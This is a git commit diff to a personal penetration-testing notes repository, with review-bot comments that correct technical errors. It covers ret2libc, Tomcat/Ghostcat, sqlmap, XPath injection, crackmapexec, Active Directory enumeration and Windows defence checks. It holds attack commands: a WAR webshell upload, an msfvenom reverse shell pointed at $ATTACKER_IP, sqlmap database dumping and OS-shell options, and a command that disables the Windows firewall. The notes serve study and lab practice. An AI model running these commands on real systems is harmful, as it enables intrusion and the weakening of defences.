bump
This commit is contained in:
parent
0caf7edbf6
commit
361227c060
|
@ -1,5 +1,7 @@
|
|||
# Ret2libc
|
||||
|
||||
* [ir0nstone ret2libc](https://ir0nstone.gitbook.io/notes/types/stack/return-oriented-programming/ret2libc)
|
||||
|
||||
* Check binary via
|
||||
* `checksec`, PIE shows start address, RELRO shows permissions of r/w to got
|
||||
* `file`
|
||||
|
|
|
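Review bot: the `checksec` bullet misstates what the two columns mean: PIE is a yes/no flag saying whether the binary is position-independent (so its load address is randomized by ASLR), not a start address, and RELRO controls whether the GOT is writable (Partial RELRO leaves `.got.plt` writable, Full RELRO makes the whole GOT read-only after relocation). Suggest rewording to something like `* checksec: PIE = position independent, base randomized; RELRO = whether the GOT is writable (Full RELRO means it is not)`.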
@ -0,0 +1,14 @@
|
|||
# Ghostcat
|
||||
|
||||
* CVE-2020-1938
|
||||
* Msfconsole or [exploitdb](https://www.exploit-db.com/exploits/48143)
|
||||
* Craft a manual war shell shown at [hacktrick's tomcat site](https://book.hacktricks.xyz/pentesting/pentesting-web/tomcat#reverse-shell)
|
||||
* upload the file via
|
||||
```sh
|
||||
curl -T ./webshell.war -u 'user:password' http://$TARGET_IP:8080/manager/text/deploy?path=/shello
|
||||
```
|
||||
* Visit the webshell at `$TARGET_IP:8080/shello/`
|
||||
* Alternatively use a war reverse shell via
|
||||
```sh
|
||||
msfvenom -p java/jsp_shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=4449 -f war -o revshell.war
|
||||
```
|
|
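Review bot: the heading conflates two different things. CVE-2020-1938 (Ghostcat) is a flaw in Tomcat's AJP connector (port 8009) that lets requests read and include files from the web application directory, while the `curl -T ... /manager/text/deploy` and `msfvenom ... -f war` bullets target the Tomcat Manager application, which needs valid credentials (the `/manager/text` interface requires an account with the `manager-script` role) and has nothing to do with the AJP issue. Suggest keeping only the CVE and exploit-db bullets under `# Ghostcat` and moving the WAR deployment bullets to a separate `# Tomcat Manager` section.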
@ -135,40 +135,6 @@ GET /about/0 UNION select column_name, null,null,null,null from information_sche
|
|||
GET /about/0 UNION all select notes, null, null, null, null from users where id = 4711 HTTP/1.1
|
||||
```
|
||||
|
||||
## Tools
|
||||
### SQLmap
|
||||
* [sqlmap](https://github.com/sqlmapproject/sqlmap.git)
|
||||
* [CheatSheet](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/)
|
||||
* [Examples](https://www.security-sleuth.com/sleuth-blog/2017/1/3/sqlmap-cheat-sheet)
|
||||
* Use `-r` with a saved HTTP request
|
||||
```sh
|
||||
sqlmap -r request.txt --dbms=mysql --dump
|
||||
sqlmap -r request.txt --batch
|
||||
```
|
||||
* Select form data automatically
|
||||
```sh
|
||||
sqlmap -u http://<target-IP>/site.php --forms --dump-all
|
||||
```
|
||||
* [Get reverse shell via sqlmap](https://www.hackingarticles.in/shell-uploading-in-web-server-using-sqlmap/)
|
||||
|
||||
|
||||
|Parameter|Details|
|
||||
|-r|Uses the intercepted request save as a file|
|
||||
|--dbms|DBMS of target|
|
||||
|--dump|Dump the entire database|
|
||||
|--dump-all|Dump everything|
|
||||
|-p |TESTPARAMETER|
|
||||
|--os-shell|Prompt for an interactive operating system shell|
|
||||
|--os-pwn|Prompt for an OOB shell, Meterpreter or VNC|
|
||||
|
||||
### Damn Small SQLi Scanner (DSSS)
|
||||
* [Script](https://github.com/stamparm/DSSS.git)
|
||||
```sh
|
||||
python dsss.py -u "http://example.com/index.php?id="
|
||||
```
|
||||
|
||||
### Online sqlmap
|
||||
* [Link](https://suip.biz/?act=sqlmap)
|
||||
|
||||
## Payloads
|
||||
* [List](https://github.com/payloadbox/sql-injection-payload-list#generic-sql-injection-payloads)
|
||||
|
||||
|
|
|
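Review bot: this removal also drops the `## Payloads` heading and its payloadbox link, but the new SQLmap file created in this commit only carries the tools and the parameter table, so the payload list link disappears from the repository altogether. If the intent was just to move the tools into their own file, keep `## Payloads` and `* [List](...)` in the SQL injection file or carry them over.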
@ -0,0 +1,43 @@
|
|||
# SQLmap
|
||||
|
||||
|
||||
* [sqlmap](https://github.com/sqlmapproject/sqlmap.git)
|
||||
* [CheatSheet](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/)
|
||||
* [Examples](https://www.security-sleuth.com/sleuth-blog/2017/1/3/sqlmap-cheat-sheet)
|
||||
|
||||
## Usage
|
||||
|
||||
* Use `-r` with a saved HTTP request
|
||||
```sh
|
||||
sqlmap -r request.txt --dbms=mysql --dump
|
||||
sqlmap -r request.txt --batch
|
||||
```
|
||||
* Select form data automatically
|
||||
```sh
|
||||
sqlmap -u http://<target-IP>/site.php --forms --dump-all
|
||||
```
|
||||
* [Get reverse shell via sqlmap](https://www.hackingarticles.in/shell-uploading-in-web-server-using-sqlmap/)
|
||||
|
||||
|
||||
|Parameter|Details|
|
||||
|-r|Uses the intercepted request save as a file|
|
||||
|--dbms|DBMS of target|
|
||||
|--dump|Dump the entire database|
|
||||
|--dump-all|Dump everything|
|
||||
|-p |TESTPARAMETER|
|
||||
|--os-shell|Prompt for an interactive operating system shell|
|
||||
|--os-pwn|Prompt for an OOB shell, Meterpreter or VNC|
|
||||
|--tables|Show tables|
|
||||
|-T|Specify table|
|
||||
|
||||
## Other Tools
|
||||
|
||||
### Damn Small SQLi Scanner (DSSS)
|
||||
* [Script](https://github.com/stamparm/DSSS.git)
|
||||
```sh
|
||||
python dsss.py -u "http://example.com/index.php?id="
|
||||
```
|
||||
|
||||
### Online sqlmap
|
||||
* [Link](https://suip.biz/?act=sqlmap)
|
||||
|
|
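Review bot: several rows of the parameter table are placeholders or inaccurate: `|-p |TESTPARAMETER|` is sqlmap's help-text placeholder rather than a description (it should read "testable parameter(s)"), the `-r` row has a typo ("request save as a file" should be "request saved to a file"), and `--dump` dumps the entries of the selected table or database while `--dump-all` dumps the tables of all databases, so "Dump the entire database" versus "Dump everything" does not capture the difference. `--batch` is used in the first example but missing from the table; add a row such as `|--batch|Never ask for user input, use the default behaviour|`.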
@ -1 +1 @@
|
|||
Subproject commit 6f2150134dc637ff80478f623f28bb548ea2ca15
|
||||
Subproject commit 616b0e527f62dd0930e6346ede6bef79e9bcf717
|
|
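Review bot: the commit message `bump` does not say which submodule this `Subproject commit` change belongs to or why it was advanced, and the file path is not visible in this view either; since the commit moves three submodules, a message naming them would make the history searchable.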
@ -0,0 +1,6 @@
|
|||
# XPATH injection
|
||||
|
||||
* Similar to SQL injection, it is a input/parameter injection
|
||||
|
||||
* [payloads all the things XPATH](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XPATH%20Injection)
|
||||
* Use [lanfran's payload list](https://lanfran02.github.io/posts/cold_vvars/XPATH_list.txt) as burpsuite sniper payload
|
|
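Review bot: "a input/parameter injection" should be "an input/parameter injection", and the bullet should say what the input is injected into: XPath injection happens when untrusted input is concatenated into an XPath query evaluated against XML data, so the same quote and boolean-logic ideas as SQLi apply but there is no database behind it. Suggest: `* Similar to SQL injection, but the user input lands in an XPath query over an XML document rather than in a SQL statement`.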
@ -0,0 +1,9 @@
|
|||
# crackmapexec
|
||||
|
||||
* In general, the syntax is as follows
|
||||
```sh
|
||||
crackmapexec smb $DOMAIN -u <user> -p <password>
|
||||
```
|
||||
* Do not set the domain at the end, it won't work.
|
||||
|
||||
|
|
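Review bot: the variable name in `crackmapexec smb $DOMAIN -u <user> -p <password>` is misleading: the positional argument after `smb` is the target (host, IP, CIDR range or a file of targets), not the domain, and the domain is passed with `-d <domain>`. That is most likely why "Do not set the domain at the end, it won't work" was observed. Suggest `crackmapexec smb $TARGET -u <user> -p <password> -d <domain>` and one placeholder style throughout (either `$VAR` or `<var>`, not both).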
@ -0,0 +1,3 @@
|
|||
# SMTP
|
||||
|
||||
* [hacktrick's site](https://book.hacktricks.xyz/pentesting/pentesting-smtp)
|
|
@ -0,0 +1,30 @@
|
|||
# Active Directory Enumeration
|
||||
|
||||
* Consists of
|
||||
* Domain Controller
|
||||
* Organizational Units
|
||||
* AD Domains
|
||||
* AD Forest
|
||||
|
||||
* Administrative accounts are
|
||||
* Domain Admin
|
||||
* Enterprise Admin
|
||||
* Schema Admin
|
||||
* Server Operator
|
||||
* Account Operator
|
||||
|
||||
## Usage
|
||||
|
||||
* `systeminfo | findstr Domain`
|
||||
* `Get-ADUser -filter *`
|
||||
* Use found CN and DC and specify
|
||||
* `Get-ADUser -filter * -searchBase "CN=Users,DC=<foundDC>,DC=<domainEnding>"`
|
||||
|
||||
### DNS
|
||||
* Check ip via `ipconfig`
|
||||
* `nslookup`, then `server <LocalIP>` and zone transfer via
|
||||
```sh
|
||||
ls -d <Domain>
|
||||
```
|
||||
|
||||
|
|
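Review bot: the "Administrative accounts are" list names groups, not accounts (Domain Admins, Enterprise Admins, Schema Admins, Server Operators and Account Operators are built-in security groups), so rename the bullet to "Privileged groups" and use the plural names. `Get-ADUser` needs the ActiveDirectory module (RSAT) or a session on a domain controller, which is worth stating since it is "not recognized" on a plain workstation. In the DNS section, `ls -d <Domain>` is typed at the interactive `nslookup` prompt after `server <LocalIP>`, not in a shell, so the ```sh fence misrepresents where it runs; the zone transfer also only succeeds when the DNS server allows AXFR to that client, which is the setting a defender should check.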
@ -8,6 +8,32 @@
|
|||
* Static Detection -- Hash or String/Byte Matching
|
||||
* Dynamic / Heuristic / Behaviourial Detection -- predefined rules, run inside a sandbox
|
||||
|
||||
## Enumeration
|
||||
```sh
|
||||
wmic /namespace:\\root\securitycenter2 path antivirusproduct
|
||||
Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct
|
||||
```
|
||||
```sh
|
||||
Get-Service WinDefend
|
||||
Get-MpComputerStatus | select RealTimeProtectionEnabled
|
||||
```
|
||||
* Check firewall
|
||||
```sh
|
||||
Get-NetFirewallProfile | Format-Table Name, Enabled
|
||||
```
|
||||
```sh
|
||||
Get-NetFirewallRule | select DisplayName, Enabled, Description
|
||||
```
|
||||
* Check inbound port availability
|
||||
```sh
|
||||
Test-NetConnection -ComputerName 127.0.0.1 -Port 80
|
||||
```
|
||||
|
||||
## Reset Options
|
||||
```sh
|
||||
Set-NetFirewallProfile -Profile Domain, Public, Private -Enabled False
|
||||
```
|
||||
|
||||
## Anti Malware Secure Interface
|
||||
* https://docs.microsoft.com/en-us/windows/win32/amsi/
|
||||
|
|
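Review bot: `## Reset Options` is a misleading heading: `Set-NetFirewallProfile -Profile Domain, Public, Private -Enabled False` disables the host firewall on every profile, which is a destructive change rather than a reset; name the section for what it does and pair it with the `-Enabled True` form so the original state can be restored. Other points: "Behaviourial" should be "Behavioural"; the last heading should be "Antimalware Scan Interface" (that is what AMSI stands for, matching the linked docs); and the fences are tagged `sh` for commands that are `cmd` (`wmic`) and PowerShell (`Get-CimInstance`, `Get-MpComputerStatus`, `Get-NetFirewall*`, `Test-NetConnection`), so tag them `powershell`.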
@ -8,3 +8,9 @@ reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\Transc
|
|||
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\Transcription /v OutputDirectory /t REG_SZ /d C:/ /f
|
||||
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\Transcription /v EnableInvocationHeader /t REG_DWORD /d 0x1 /f
|
||||
```
|
||||
|
||||
## Usage
|
||||
|
||||
```sh
|
||||
Get-EventLog -List
|
||||
```
|
||||
|
|
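Review bot: `/d C:/` points transcription at the root of the system drive with a forward slash; use a Windows-style path to a dedicated directory with restricted ACLs (for example `C:\PSTranscripts`, a hypothetical name) so transcripts are not readable by every local user and the drive root does not fill with log files. Also, `Get-EventLog` exists only in Windows PowerShell 5.1 and was removed from PowerShell 7; `Get-WinEvent -ListLog *` works in both, so it is the safer command to document under `## Usage`.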
File diff suppressed because one or more lines are too long
|
@ -1 +1 @@
|
|||
Subproject commit 60cf85b349f32c3410bdff73b421120d39d95470
|
||||
Subproject commit 7c94b90223cd40c664b6e0107b5f1bf744ab5d17
|
|
@ -1 +1 @@
|
|||
Subproject commit 8c67152e1761fb9b403918a7fa174126f36f61db
|
||||
Subproject commit 7c275d50bc324f3152650fe22b3f92bb4da23275
|